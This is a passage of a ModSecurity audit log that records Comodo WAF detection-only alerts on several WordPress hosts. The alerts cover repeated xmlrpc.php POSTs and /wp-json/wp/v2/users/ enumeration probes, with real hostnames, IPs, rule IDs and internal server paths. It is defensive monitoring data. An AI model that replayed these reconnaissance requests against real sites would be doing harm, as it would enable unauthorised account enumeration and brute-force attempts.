"aE8DSpIGHJmWDi7BX1VrWAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008650111284 352045 (- - -) Stopwatch2: 1750008650111284 352045; combined=2875, p1=455, p2=1929, p3=96, p4=43, p5=220, sr=122, sw=132, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --835a5c16-Z-- --3be48a3b-A-- [15/Jun/2025:23:01:09.682218 +0530] aE8DXL59833JshVCMq_hQAAAAAY 128.199.112.101 48512 127.0.0.1 7081 --3be48a3b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --3be48a3b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3be48a3b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8DXL59833JshVCMq_hQAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008668749132 933163 (- - -) Stopwatch2: 1750008668749132 933163; combined=2886, p1=478, p2=1952, p3=51, p4=72, p5=209, sr=130, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3be48a3b-Z-- --edae7408-A-- [15/Jun/2025:23:01:52.482435 +0530] aE8DiGCPauOs0aEe3c1AUAAAAAI 183.56.195.106 48250 127.0.0.1 7081 --edae7408-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --edae7408-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --edae7408-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (34+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (34+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8DiGCPauOs0aEe3c1AUAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008712150462 332037 (- - -) Stopwatch2: 1750008712150462 332037; combined=2256, p1=344, p2=1487, p3=86, p4=39, p5=185, sr=99, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --edae7408-Z-- --afa81405-A-- [15/Jun/2025:23:02:09.764106 +0530] aE8DmJIGHJmWDi7BX1VroAAAAAA 128.199.112.101 46008 127.0.0.1 7081 --afa81405-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --afa81405-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --afa81405-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8DmJIGHJmWDi7BX1VroAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008728789586 974588 (- - -) Stopwatch2: 1750008728789586 974588; combined=2948, p1=474, p2=2029, p3=46, p4=68, p5=201, sr=130, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --afa81405-Z-- --131f963b-A-- [15/Jun/2025:23:03:09.987667 +0530] aE8D1N0-aAh4pf-B9Ye8mQAAAAs 128.199.112.101 58890 127.0.0.1 7081 --131f963b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --131f963b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --131f963b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8D1N0-aAh4pf-B9Ye8mQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008788948514 1039209 (- - -) Stopwatch2: 1750008788948514 1039209; combined=2212, p1=364, p2=1492, p3=35, p4=48, p5=169, sr=92, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --131f963b-Z-- --5c1c0120-A-- [15/Jun/2025:23:03:58.596607 +0530] aE8EBow8YNvdo5WL3neuzAAAAAc 35.236.231.185 46894 127.0.0.1 7081 --5c1c0120-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 35.236.231.185 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --5c1c0120-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,User-Agent Connection: close Content-Type: application/json; charset=UTF-8 --5c1c0120-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "archangledesignstudio.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8EBow8YNvdo5WL3neuzAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008838337848 258833 (- - -) Stopwatch2: 1750008838337848 258833; combined=1708, p1=344, p2=1289, p3=0, p4=0, p5=75, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5c1c0120-Z-- --ca98ef2a-A-- [15/Jun/2025:23:04:00.812070 +0530] aE8ECEmAj8yxyFrMChh1eAAAAAE 35.236.231.185 44864 127.0.0.1 7081 --ca98ef2a-B-- POST //xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 35.236.231.185 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ca98ef2a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --ca98ef2a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.236.231.185 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.236.231.185 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8ECEmAj8yxyFrMChh1eAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008840510220 301905 (- - -) Stopwatch2: 1750008840510220 301905; combined=2392, p1=392, p2=1676, p3=35, p4=49, p5=150, sr=116, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca98ef2a-Z-- --2339bd18-A-- [15/Jun/2025:23:04:10.102563 +0530] aE8EEZIGHJmWDi7BX1Vr-QAAAAA 128.199.112.101 45828 127.0.0.1 7081 --2339bd18-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2339bd18-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2339bd18-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8EEZIGHJmWDi7BX1Vr-QAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008849149399 953220 (- - -) Stopwatch2: 1750008849149399 953220; combined=2159, p1=338, p2=1432, p3=43, p4=66, p5=175, sr=101, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2339bd18-Z-- --450f5e78-A-- [15/Jun/2025:23:05:10.135543 +0530] aE8ETQZ37L8e68IeSGnwRAAAAAo 128.199.112.101 39042 127.0.0.1 7081 --450f5e78-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --450f5e78-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --450f5e78-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8ETQZ37L8e68IeSGnwRAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008909205091 930521 (- - -) Stopwatch2: 1750008909205091 930521; combined=2216, p1=386, p2=1366, p3=46, p4=72, p5=212, sr=92, sw=134, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --450f5e78-Z-- --adeeb900-A-- [15/Jun/2025:23:06:10.840529 +0530] aE8EiarcvwHXckZU_xqT8QAAAAM 128.199.112.101 44764 127.0.0.1 7081 --adeeb900-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --adeeb900-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --adeeb900-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8EiarcvwHXckZU_xqT8QAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008969907776 932811 (- - -) Stopwatch2: 1750008969907776 932811; combined=2076, p1=338, p2=1329, p3=41, p4=65, p5=186, sr=91, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adeeb900-Z-- --4ebe1717-A-- [15/Jun/2025:23:07:10.402307 +0530] aE8ExgZ37L8e68IeSGnwpAAAAAo 172.70.54.174 40780 127.0.0.1 7081 --4ebe1717-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.70.54.174 X-Forwarded-For: 2001:1810:4181:120:0:4:42af:2c35 Connection: close cf-ray: 9503d575be1102e4-MIA cf-connecting-ip: 2001:1810:4181:120:0:4:42af:2c35 user-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https cf-ipcountry: US referer: http://getcalley.com///wp-json/wp/v2/users/ cf-visitor: {"scheme":"https"} --4ebe1717-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --4ebe1717-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8ExgZ37L8e68IeSGnwpAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009030167025 235398 (- - -) Stopwatch2: 1750009030167025 235398; combined=1912, p1=342, p2=1457, p3=0, p4=0, p5=112, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ebe1717-Z-- --4e31a17a-A-- [15/Jun/2025:23:07:10.714125 +0530] aE8ExZIGHJmWDi7BX1VsZgAAAAA 128.199.112.101 40768 127.0.0.1 7081 --4e31a17a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4e31a17a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4e31a17a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8ExZIGHJmWDi7BX1VsZgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009029777288 936893 (- - -) Stopwatch2: 1750009029777288 936893; combined=2329, p1=353, p2=1553, p3=48, p4=72, p5=184, sr=94, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e31a17a-Z-- --d6eb1b7c-A-- [15/Jun/2025:23:08:10.413777 +0530] aE8FAeH9BJXsU-nEvf_ibQAAAAQ 128.199.112.101 51372 127.0.0.1 7081 --d6eb1b7c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d6eb1b7c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d6eb1b7c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8FAeH9BJXsU-nEvf_ibQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009089490076 923757 (- - -) Stopwatch2: 1750009089490076 923757; combined=2710, p1=399, p2=1926, p3=42, p4=64, p5=173, sr=128, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6eb1b7c-Z-- --fdb33874-A-- [15/Jun/2025:23:08:35.609881 +0530] aE8FG6rcvwHXckZU_xqURwAAAAM 162.158.63.62 50414 127.0.0.1 7081 --fdb33874-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 162.158.63.62 X-Forwarded-For: 143.198.127.169 Connection: close cf-ray: 9503d78aad480c86-EWR cdn-loop: cloudflare; loops=1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: US cf-connecting-ip: 143.198.127.169 cf-visitor: {"scheme":"https"} --fdb33874-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --fdb33874-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8FG6rcvwHXckZU_xqURwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009115350789 259179 (- - -) Stopwatch2: 1750009115350789 259179; combined=1836, p1=339, p2=1417, p3=0, p4=0, p5=80, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache 